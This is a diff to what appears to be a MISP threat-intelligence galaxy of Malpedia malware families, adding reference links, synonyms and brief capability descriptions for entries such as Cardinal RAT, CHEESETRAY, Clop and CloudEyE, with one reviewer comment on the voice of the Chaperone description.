- "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf",
- "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf"
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest",
+ "https://threatintel.blog/OPBlueRaven-Part2/",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html"
 ],
 "synonyms": [
 "Anunak"
@@ -5569,7 +10817,10 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp",
+ "https://blog.avast.com/2013/04/08/carberp_epitaph/",
+ "https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf",
+ "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -5578,11 +10829,13 @@
 "value": "Carberp"
 },
 {
- "description": "",
+ "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed \u201cCarp\u201d which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat",
 "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412",
+ "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
 "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/"
 ],
 "synonyms": [],
@@ -5591,12 +10844,26 @@
 "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e",
 "value": "Cardinal RAT"
 },
+ {
+ "description": "CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball",
+ "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cca82b51-fef9-4f33-a2f5-418b80d0966d",
+ "value": "CARROTBALL"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat",
- "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/"
+ "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/"
 ],
 "synonyms": [],
 "type": []
@@ -5636,21 +10903,28 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor",
 "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities",
- "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident",
+ "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/",
 "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/",
 "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident",
 "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
 "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/",
+ "https://risky.biz/whatiswinnti/",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
 "https://blog.avast.com/progress-on-ccleaner-investigation",
 "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms",
+ "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
 "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer",
 "https://twitter.com/craiu/status/910148928796061696",
- "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/",
+ "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident",
 "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor",
 "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/",
 "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html"
 ],
- "synonyms": [],
+ "synonyms": [
+ "DIRTCLEANER"
+ ],
 "type": []
 },
 "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139",
@@ -5676,9 +10950,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/",
- "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html",
 "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/",
+ "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
 "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/"
 ],
 "synonyms": [],
@@ -5705,6 +10982,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot",
 "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/",
+ "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec",
 "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack"
 ],
 "synonyms": [],
@@ -5713,18 +10991,50 @@
 "uuid": "36f9a5e0-9a78-4b9a-9072-1596c91b59b6",
 "value": "Chainshot"
 },
+ {
+ "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim\u2019s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone",
+ "https://securelist.com/project-tajmahal/90240/",
+ "https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ ],
+ "synonyms": [
+ "Taj Mahal"
+ ],
+ "type": []
+ },
+ "uuid": "e4027aaa-de86-48ea-8567-c215cdb88ec1",
+ "value": "Chaperone"
+ },
+ {
+ "description": "CHCH is a Ransomware spotted in the wild in December 2019. It encrypts victim files and adds the extension .chch to them while it drops a ransomware note named: READ_ME.TXT",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chch",
+ "https://twitter.com/GrujaRS/status/1205566219971125249"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "22b03600-505c-41d4-ba1c-45d70cc2e123",
+ "value": "CHCH Ransomware"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches",
 "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html",
- "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html",
 "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/",
 "https://www.jpcert.or.jp/magazine/acreport-ChChes.html",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html"
 ],
 "synonyms": [
+ "HAYMAKER",
 "Ham Backdoor"
 ],
 "type": []
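Review bot: The Chaperone description added in this hunk switches voice mid-paragraph: it opens with "According to Kaspersky GReAT and AMR, TajMahal is…" and then continues in the vendor's first person ("We discovered up to 80 malicious modules…", "…they have ever seen"), so as galaxy text it reads as if the MISP maintainers made the discovery. Either quote the Securelist passage verbatim and mark it as a quotation, or carry the third-person attribution through, e.g. `Kaspersky found up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins it has seen for an APT toolset.` The text appears to be imported from Malpedia, so the wording fix belongs upstream as well as here.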
@@ -5732,6 +11042,36 @@
 "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c",
 "value": "ChChes"
 },
+ {
+ "description": "CHEESETRAY is a sophisticated proxy-aware backdoor that can operate in both active and passive mode depending on the passed command-line parameters. The backdoor is capable of enumerating files and processes, enumerating drivers, enumerating remote desktop sessions, uploading and downloading files, creating and terminating processes, deleting files, creating a reverse shell, acting as a proxy server, and hijacking processes among its other functionality. The backdoor communicates with its C&C server using a custom binary protocol over TCP with port specified as a command-line parameter.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray",
+ "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
+ "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c"
+ ],
+ "synonyms": [
+ "CROWDEDFLOUNDER"
+ ],
+ "type": []
+ },
+ "uuid": "7a6c1063-32b9-4007-8283-ccd4a2163caa",
+ "value": "CHEESETRAY"
+ },
+ {
+ "description": "Chernolocker is a ransomware that encrypts a victim's files by using AES-256 and it asks for BTC ransom. Different versions are classified by the attacker's email address which changes over time.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chernolocker",
+ "https://id-ransomware.blogspot.com/2019/12/chernolocker-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e21dc86d-c8a5-44f7-b9d6-5e60373e838b",
+ "value": "Chernolocker"
+ },
 {
 "description": "",
 "meta": {
@@ -5768,10 +11108,42 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper",
- "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
- "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
+ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers",
+ "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://unit42.paloaltonetworks.com/china-chopper-webshell/",
+ "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-president",
+ "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day",
+ "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
 "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html",
- "https://attack.mitre.org/software/S0020/"
+ "https://twitter.com/ESETresearch/status/1366862946488451088",
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://redcanary.com/blog/microsoft-exchange-attacks",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf",
+ "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits",
+ "https://attack.mitre.org/software/S0020/",
+ "https://blog.joshlemon.com.au/hafnium-exchange-attacks/",
+ "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-259a",
+ "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/",
+ "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers",
+ "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a",
+ "https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
+ "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/"
 ],
 "synonyms": [],
 "type": []
@@ -5791,6 +11163,39 @@
 "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61",
 "value": "Chinad"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinajm",
+ "https://id-ransomware.blogspot.com/2020/02/chinajm-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ef216f1d-9ee5-4676-ae34-f954a8611290",
+ "value": "ChinaJm Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy",
+ "https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf",
+ "https://community.riskiq.com/article/56fa1b2f",
+ "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
+ "https://documents.trendmicro.com/assets/white_papers/wp-finding-APTX-attributing-attacks-via-MITRE-TTPs.pdf",
+ "https://community.riskiq.com/article/5fe2da7f"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f8f5f33b-c719-4b6d-bf98-07979ac0cd97",
+ "value": "Chinoxy"
+ },
 {
 "description": "",
 "meta": {
@@ -5809,8 +11214,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic",
 "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
- "https://www.s21sec.com/en/blog/2017/07/androkins/",
- "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/"
+ "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/",
+ "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html"
 ],
 "synonyms": [
 "AndroKINS"
@@ -5820,15 +11225,43 @@
 "uuid": "9441a589-e23d-402d-9603-5e55e3e33971",
 "value": "Chthonic"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cifty",
+ "http://contagiodump.blogspot.com/2009/06/win32updateexe-md5-eec80fd4c7fc5cf5522f.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8a1af36b-b8e1-4e05-ac42-c2866ffba031",
+ "value": "cifty"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi",
+ "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html",
+ "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d0f0f754-fe9b-45bd-a9d2-c6110c807af4",
+ "value": "Cinobi"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel",
 "http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
+ "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
 "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html",
- "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/",
- "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/"
+ "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/"
 ],
 "synonyms": [],
 "type": []
@@ -5836,6 +11269,47 @@
 "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310",
 "value": "Citadel"
 },
+ {
+ "description": "Clambling was discovered by Trend Micro and TalentJump. It is a custom malware used by an actor they refer to as DRBControl, which targets gambling and betting companies in Southeast Asia. One version of Clambling uses Dropbox as C&C channel to hide its communication.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling",
+ "https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf",
+ "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/",
+ "https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "783c8192-d00d-446c-bf06-0ce0cb4bc2c2",
+ "value": "Clambling"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon",
+ "https://content.fireeye.com/apt-41/rpt-apt41/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c433e0f1-760c-41e6-bb62-13eaf7bbf1f4",
+ "value": "CLASSFON"
+ },
+ {
+ "description": "CLEANTOAD is a disruption tool that will delete file system artifacts, including those related to BLINDTOAD, and will run after a date obtained from a configuration file. The malware injects shellcode into notepad.exe and it overwrites and deletes files, modifies registry keys, deletes services, and clears Windows event logs.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cleantoad",
+ "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c0417767-5b98-43b0-b9e7-e43dc7f53c6a",
+ "value": "CLEANTOAD"
+ },
 {
 "description": "",
 "meta": {
@@ -5849,6 +11323,118 @@ "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", "value": "Client Maximus" }, + { + "description": "The ClipBanker Trojan is known as an information stealer and spy trojan, it aims to steal and record any type of sensitive information from the infected environment such as browser history, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet account addresses. The main goal of this threat is to steal confidential information.\r\n The ClipBanker uses PowerShell commands for executing malicious activities. The thing that made the ClipBanker unique is its ability to record various banking actions of the user and manipulate them for its own benefit. The distribution method of the ClipBanker is through phishing emails or through social media posts that lure users to download malicious content.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/", + "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5d6a9b59-96b1-4bc4-824d-ffe208b99462", + "value": "ClipBanker" + }, + { + "description": "Clop is a ransomware which uses the .clop extension after having encrypted the victim's files. Another unique characteristic belonging with Clop is in the string: \"Dont Worry C|0P\" included into the ransom notes. 
It is a variant of CryptoMix ransomware, but it additionally attempts to disable Windows Defender and to remove the Microsoft Security Essentials in order to avoid user space detection.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop", + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", + "https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/", + "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/", + "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md", + "https://github.com/Tera0017/TAFOF-Unpacker", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", + "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + 
"https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/", + "https://twitter.com/darb0ng/status/1338692764121251840", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + 
"https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", + "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8071f2d8-cc44-4682-845b-6f39a9f8b587", + "value": "Clop" + }, + { + "description": "CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader", + "https://labs.vipre.com/unloading-the-guloader/", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/", + "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html", + "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", + "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", + "https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/", + "https://twitter.com/VK_Intel/status/1255537954304524288", + "https://twitter.com/TheEnergyStory/status/1239110192060608513", + "https://twitter.com/VK_Intel/status/1252678206852907011", + 
"https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", + "https://twitter.com/sysopfb/status/1258809373159305216", + "https://research.checkpoint.com/2020/guloader-cloudeye/", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://www.joesecurity.org/blog/3535317197858305930", + "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services", + "https://twitter.com/VK_Intel/status/1257206565146370050", + "https://blog.morphisec.com/guloader-the-rat-downloader", + "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/", + "https://twitter.com/TheEnergyStory/status/1240608893610459138", + "https://www.crowdstrike.com/blog/guloader-malware-analysis/", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/", + "https://malwation.com/malware-config-extraction-diaries-1-guloader/", + "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/", + "https://labs.k7computing.com/?p=20156" + ], + "synonyms": [ + "GuLoader", + "vbdropper" + ], + "type": [] + }, + "uuid": "966f54ae-1781-4f2e-8b32-57a242a00bb9", + "value": "CloudEyE" + }, { "description": "", "meta": { @@ -5881,7 +11467,6 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", "https://twitter.com/ClearskySec/status/963829930776723461", - 